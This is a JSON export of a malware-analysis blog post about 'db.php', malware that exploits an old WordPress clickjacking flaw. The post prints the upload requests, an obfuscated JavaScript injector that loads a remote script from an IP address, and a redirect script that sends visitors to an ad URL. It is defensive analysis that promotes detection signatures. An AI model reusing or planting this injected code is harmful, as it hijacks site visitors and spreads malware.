{"id":2330,"date":"2017-03-17T00:00:15","date_gmt":"2017-03-16T21:00:15","guid":{"rendered":"https:\/\/malware.expert\/?p=2330"},"modified":"2017-03-07T12:03:14","modified_gmt":"2017-03-07T09:03:14","slug":"db-php","status":"publish","type":"post","link":"https:\/\/malware.expert\/malware\/db-php\/","title":{"rendered":"db.php"},"content":{"rendered":"

This malware try upload db.php<\/strong> to WordPress clickjacking vulnerability.<\/p>\n

Clickjacking is an attack that places an invisible iframe containing a webpage over top of another, visible webpage. The victim user is lured into clicking on the invisible iframe to perform an action when they think they are clicking on the webpage they can see. The iframe on top is made invisible using the CSS Opacity property, it is placed above other elements on the webpage by using the CSS Z-Index property, and it is lined up with the webpage underneath using CSS absolute positioning.<\/p>\n

Versions of WordPress prior to 3.1.3 are vulnerable to clickjacking, so this is very old attack method.<\/p>\n

\r\nPOST \/wp-admin\/update.php?action=upload-plugin\r\n\r\nContent-Disposition: form-data; name="_wp_http_referer"\r\n\/wp-admin\/plugin-install.php?tab=upload\r\n<\/pre>\n
\r\nPOST \/wp-admin\/update.php?action=upload-plugin\r\n\r\nContent-Disposition: form-data; name="_wp_http_referer"\r\n\/wp-admin\/theme-editor.php?file=404.php&theme=twentysixteen\r\n<\/pre>\n
db.php sourcecode<\/h2>\n
If malware successful uploaded server, it GET requests and it infects every javascript files (.js) with javascript malware code.<\/p>\n
\"db.php\"<\/p>\n
Append to javascript files<\/h2>\n
\r\nvar 0xaae8=["","\\x6A\\x6F\\x69\\x6E","\\x72\\x65\\x76\\x65\\x72\\x73\\x65","\\x73\\x70\\x6C\\x69\\x74","\\x3E\\x74\\x70\\x69\r\n\\x72\\x63\\x73\\x2F\\x3C\\x3E\\x22\\x73\\x6A\\x2E\\x79\\x72\\x65\\x75\\x71\\x6A\\x2F\\x38\\x37\\x2E\\x36\\x31\\x31\r\n\\x2E\\x39\\x34\\x32\\x2E\\x34\\x33\\x31\\x2F\\x2F\\x3A\\x70\\x74\\x74\\x68\\x22\\x3D\\x63\\x72\\x73\\x20\\x74\\x70\r\n\\x69\\x72\\x63\\x73\\x3C","\\x77\\x72\\x69\\x74\\x65"];d_ocument[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))\r\n<\/pre>\n
We decoded this javascript code and found that it try load more javascript malware:<\/p>\n
NOTE:<\/strong> Not fully decoded correct!<\/p>\n
\r\nwrite.("tpircs\/<>"sj.yreuqj\/87.611.942.431\/\/:ptth"=crs tpircs<split()reverse()join())<\/pre>\n
Source jquery.js<\/h3>\n
\r\nvar _0x8a42 = ["href", "location", "http:\/\/go.ad2up.com\/afu.php?id=473791", "getTime", "setTime", "cookie", "=", ";expires=", "toGMTString", "; path=", "", "indexOf", "length", "substring", ";", "cookieEnabled", "\/wp-admin\/", "pathname", "csrf_uid", "1", "\/", "loaded", "addEventListener", "load", "onload", "attachEvent"];\r\n<\/pre>\n
\r\nfunction _1q0x() {\r\n  window[_0x8a42[1]][_0x8a42[0]] = _0x8a42[2]\r\n}\r\n\r\nfunction _q1x0(_0x762dx3, _0x762dx4, _0x762dx5, _0x762dx6) {\r\n  var _0x762dx7 = new Date();\r\n  var _0x762dx8 = new Date();\r\n  if (_0x762dx5 === null || _0x762dx5 === 0) {\r\n    _0x762dx5 = 3\r\n  };\r\n  _0x762dx8[_0x8a42[4]](_0x762dx7[_0x8a42[3]]() + 3600000 * 24 * _0x762dx5);\r\n  document[_0x8a42[5]] = _0x762dx3 + _0x8a42[6] + escape(_0x762dx4) + _0x8a42[7] + _0x762dx8[_0x8a42[8]]() + ((_0x762dx6) ? _0x8a42[9] + _0x762dx6 : _0x8a42[10])\r\n}\r\n\r\nfunction _z1g1(_0x762dxa) {\r\n  var _0x762dxb = document[_0x8a42[5]][_0x8a42[11]](_0x762dxa + _0x8a42[6]);\r\n  var _0x762dxc = _0x762dxb + _0x762dxa[_0x8a42[12]] + 1;\r\n  if ((!_0x762dxb) && (_0x762dxa != document[_0x8a42[5]][_0x8a42[13]](0, _0x762dxa[_0x8a42[12]]))) {\r\n    return null\r\n  };\r\n  if (_0x762dxb == -1) {\r\n    return null\r\n  };\r\n  var _0x762dxd = document[_0x8a42[5]][_0x8a42[11]](_0x8a42[14], _0x762dxc);\r\n  if (_0x762dxd == -1) {\r\n    _0x762dxd = document[_0x8a42[5]][_0x8a42[12]]\r\n  };\r\n  return unescape(document[_0x8a42[5]][_0x8a42[13]](_0x762dxc, _0x762dxd))\r\n}\r\nif (navigator[_0x8a42[15]]) {\r\n  if (window[_0x8a42[1]][_0x8a42[17]][_0x8a42[11]](_0x8a42[16]) != -1) {\r\n    _q1x0(_0x8a42[18], _0x8a42[19], _0x8a42[19], _0x8a42[20])\r\n  };\r\n  if (window[_0x8a42[1]][_0x8a42[17]][_0x8a42[11]](_0x8a42[16]) == -1) {\r\n    if (_z1g1(_0x8a42[18]) == 1) {} else {\r\n      _q1x0(_0x8a42[18], _0x8a42[19], _0x8a42[19], _0x8a42[20]);\r\n      if (document[_0x8a42[21]]) {\r\n        _1q0x()\r\n      } else {\r\n        if (window[_0x8a42[22]]) {\r\n          window[_0x8a42[22]](_0x8a42[23], _1q0x, false)\r\n        } else {\r\n          window[_0x8a42[25]](_0x8a42[24], _1q0x)\r\n        }\r\n      }\r\n    }\r\n  }\r\n<\/pre>\n
Finals<\/h2>\n
So this is endless loop, to get more and more malware, but also trying somepoint open ShockwaveFlash malware too ..<\/p>\n
Use Malware Expert Signatures<\/a> to detect this malware.<\/p>\n","protected":false},"excerpt":{"rendered":"
This malware try upload db.php to WordPress clickjacking vulnerability. Clickjacking is an attack that places an invisible iframe containing a webpage over top of another, visible webpage. The victim user is lured into clicking on the invisible iframe to perform an action when they think they are clicking on the webpage they can see. The … Read more<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[66],"tags":[180,179,39,103],"class_list":["post-2330","post","type-post","status-publish","format-standard","hentry","category-malware","tag-clickjacking","tag-db-php","tag-vulnerability","tag-wordpress"],"yoast_head":"\ndb.php<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/malware.expert\/malware\/db-php\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"db.php\" \/>\n<meta property=\"og:description\" content=\"This malware try upload db.php to WordPress clickjacking vulnerability. Clickjacking is an attack that places an invisible iframe containing a webpage over top of another, visible webpage. The victim user is lured into clicking on the invisible iframe to perform an action when they think they are clicking on the webpage they can see. The ... Read more\" \/>\n<meta property=\"og:url\" content=\"https:\/\/malware.expert\/malware\/db-php\/\" \/>\n<meta property=\"og:site_name\" content=\"Malware Expert\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Malware.Expert\/\" \/>\n<meta property=\"article:published_time\" content=\"2017-03-16T21:00:15+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/malware.expert\/wp-content\/uploads\/2017\/02\/db_php-1024x486.png\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@Malware__Expert\" \/>\n<meta name=\"twitter:site\" content=\"@Malware__Expert\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/malware.expert\/malware\/db-php\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/malware.expert\/malware\/db-php\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/malware.expert\/#\/schema\/person\/1016f76dbc76823a9aba2ba8f14abfd3\"},\"headline\":\"db.php\",\"datePublished\":\"2017-03-16T21:00:15+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/malware.expert\/malware\/db-php\/\"},\"wordCount\":703,\"publisher\":{\"@id\":\"https:\/\/malware.expert\/#organization\"},\"image\":{\"@id\":\"https:\/\/malware.expert\/malware\/db-php\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/malware.expert\/wp-content\/uploads\/2017\/02\/db_php-1024x486.png\",\"keywords\":[\"clickjacking\",\"db.php\",\"vulnerability\",\"wordpress\"],\"articleSection\":[\"malware\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/malware.expert\/malware\/db-php\/\",\"url\":\"https:\/\/malware.expert\/malware\/db-php\/\",\"name\":\"db.php\",\"isPartOf\":{\"@id\":\"https:\/\/malware.expert\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/malware.expert\/malware\/db-php\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/malware.expert\/malware\/db-php\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/malware.expert\/wp-content\/uploads\/2017\/02\/db_php-1024x486.png\",\"datePublished\":\"2017-03-16T21:00:15+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/malware.expert\/malware\/db-php\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/malware.expert\/malware\/db-php\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/malware.expert\/malware\/db-php\/#primaryimage\",\"url\":\"https:\/\/malware.expert\/wp-content\/uploads\/2017\/02\/db_php.png\",\"contentUrl\":\"https:\/\/malware.expert\/wp-content\/uploads\/2017\/02\/db_php.png\",\"width\":2450,\"height\":1162,\"caption\":\"db.php\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/malware.expert\/malware\/db-php\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/malware.expert\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"malware\",\"item\":\"https:\/\/malware.expert\/category\/malware\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"db.php\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/malware.expert\/#website\",\"url\":\"https:\/\/malware.expert\/\",\"name\":\"Malware Expert\",\"description\":\"ModSecurity rules\",\"publisher\":{\"@id\":\"https:\/\/malware.expert\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/malware.expert\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/malware.expert\/#organization\",\"name\":\"Malware Expert\",\"url\":\"https:\/\/malware.expert\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/malware.expert\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/malware.expert\/wp-content\/uploads\/2023\/08\/cropped-malware_express_header_logo.png\",\"contentUrl\":\"https:\/\/malware.expert\/wp-content\/uploads\/2023\/08\/cropped-malware_express_header_logo.png\",\"width\":408,\"height\":82,\"caption\":\"Malware Expert\"},\"image\":{\"@id\":\"https:\/\/malware.expert\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/Malware.Expert\/\",\"https:\/\/x.com\/Malware__Expert\"],\"publishingPrinciples\":\"https:\/\/malware.expert\/editorial-guidelines\/\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/malware.expert\/#\/schema\/person\/1016f76dbc76823a9aba2ba8f14abfd3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/malware.expert\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/76c5b003c7f6492ce413d3ad91151c1d648c58e54c5b360eeb19eec3562a0393?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/76c5b003c7f6492ce413d3ad91151c1d648c58e54c5b360eeb19eec3562a0393?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"http:\/\/willberg.me\"],\"url\":\"https:\/\/malware.expert\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"db.php","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/malware.expert\/malware\/db-php\/","og_locale":"en_US","og_type":"article","og_title":"db.php","og_description":"This malware try upload db.php to WordPress clickjacking vulnerability. Clickjacking is an attack that places an invisible iframe containing a webpage over top of another, visible webpage. The victim user is lured into clicking on the invisible iframe to perform an action when they think they are clicking on the webpage they can see. The ... Read more","og_url":"https:\/\/malware.expert\/malware\/db-php\/","og_site_name":"Malware Expert","article_publisher":"https:\/\/www.facebook.com\/Malware.Expert\/","article_published_time":"2017-03-16T21:00:15+00:00","og_image":[{"url":"https:\/\/malware.expert\/wp-content\/uploads\/2017\/02\/db_php-1024x486.png","type":"","width":"","height":""}],"author":"admin","twitter_card":"summary_large_image","twitter_creator":"@Malware__Expert","twitter_site":"@Malware__Expert","twitter_misc":{"Written by":"admin","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/malware.expert\/malware\/db-php\/#article","isPartOf":{"@id":"https:\/\/malware.expert\/malware\/db-php\/"},"author":{"name":"admin","@id":"https:\/\/malware.expert\/#\/schema\/person\/1016f76dbc76823a9aba2ba8f14abfd3"},"headline":"db.php","datePublished":"2017-03-16T21:00:15+00:00","mainEntityOfPage":{"@id":"https:\/\/malware.expert\/malware\/db-php\/"},"wordCount":703,"publisher":{"@id":"https:\/\/malware.expert\/#organization"},"image":{"@id":"https:\/\/malware.expert\/malware\/db-php\/#primaryimage"},"thumbnailUrl":"https:\/\/malware.expert\/wp-content\/uploads\/2017\/02\/db_php-1024x486.png","keywords":["clickjacking","db.php","vulnerability","wordpress"],"articleSection":["malware"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/malware.expert\/malware\/db-php\/","url":"https:\/\/malware.expert\/malware\/db-php\/","name":"db.php","isPartOf":{"@id":"https:\/\/malware.expert\/#website"},"primaryImageOfPage":{"@id":"https:\/\/malware.expert\/malware\/db-php\/#primaryimage"},"image":{"@id":"https:\/\/malware.expert\/malware\/db-php\/#primaryimage"},"thumbnailUrl":"https:\/\/malware.expert\/wp-content\/uploads\/2017\/02\/db_php-1024x486.png","datePublished":"2017-03-16T21:00:15+00:00","breadcrumb":{"@id":"https:\/\/malware.expert\/malware\/db-php\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/malware.expert\/malware\/db-php\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/malware.expert\/malware\/db-php\/#primaryimage","url":"https:\/\/malware.expert\/wp-content\/uploads\/2017\/02\/db_php.png","contentUrl":"https:\/\/malware.expert\/wp-content\/uploads\/2017\/02\/db_php.png","width":2450,"height":1162,"caption":"db.php"},{"@type":"BreadcrumbList","@id":"https:\/\/malware.expert\/malware\/db-php\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/malware.expert\/"},{"@type":"ListItem","position":2,"name":"malware","item":"https:\/\/malware.expert\/category\/malware\/"},{"@type":"ListItem","position":3,"name":"db.php"}]},{"@type":"WebSite","@id":"https:\/\/malware.expert\/#website","url":"https:\/\/malware.expert\/","name":"Malware Expert","description":"ModSecurity rules","publisher":{"@id":"https:\/\/malware.expert\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/malware.expert\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/malware.expert\/#organization","name":"Malware Expert","url":"https:\/\/malware.expert\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/malware.expert\/#\/schema\/logo\/image\/","url":"https:\/\/malware.expert\/wp-content\/uploads\/2023\/08\/cropped-malware_express_header_logo.png","contentUrl":"https:\/\/malware.expert\/wp-content\/uploads\/2023\/08\/cropped-malware_express_header_logo.png","width":408,"height":82,"caption":"Malware Expert"},"image":{"@id":"https:\/\/malware.expert\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Malware.Expert\/","https:\/\/x.com\/Malware__Expert"],"publishingPrinciples":"https:\/\/malware.expert\/editorial-guidelines\/"},{"@type":"Person","@id":"https:\/\/malware.expert\/#\/schema\/person\/1016f76dbc76823a9aba2ba8f14abfd3","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/malware.expert\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/76c5b003c7f6492ce413d3ad91151c1d648c58e54c5b360eeb19eec3562a0393?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/76c5b003c7f6492ce413d3ad91151c1d648c58e54c5b360eeb19eec3562a0393?s=96&d=mm&r=g","caption":"admin"},"sameAs":["http:\/\/willberg.me"],"url":"https:\/\/malware.expert\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/posts\/2330","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/comments?post=2330"}],"version-history":[{"count":6,"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/posts\/2330\/revisions"}],"predecessor-version":[{"id":22657,"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/posts\/2330\/revisions\/22657"}],"wp:attachment":[{"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/media?parent=2330"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/categories?post=2330"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/tags?post=2330"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}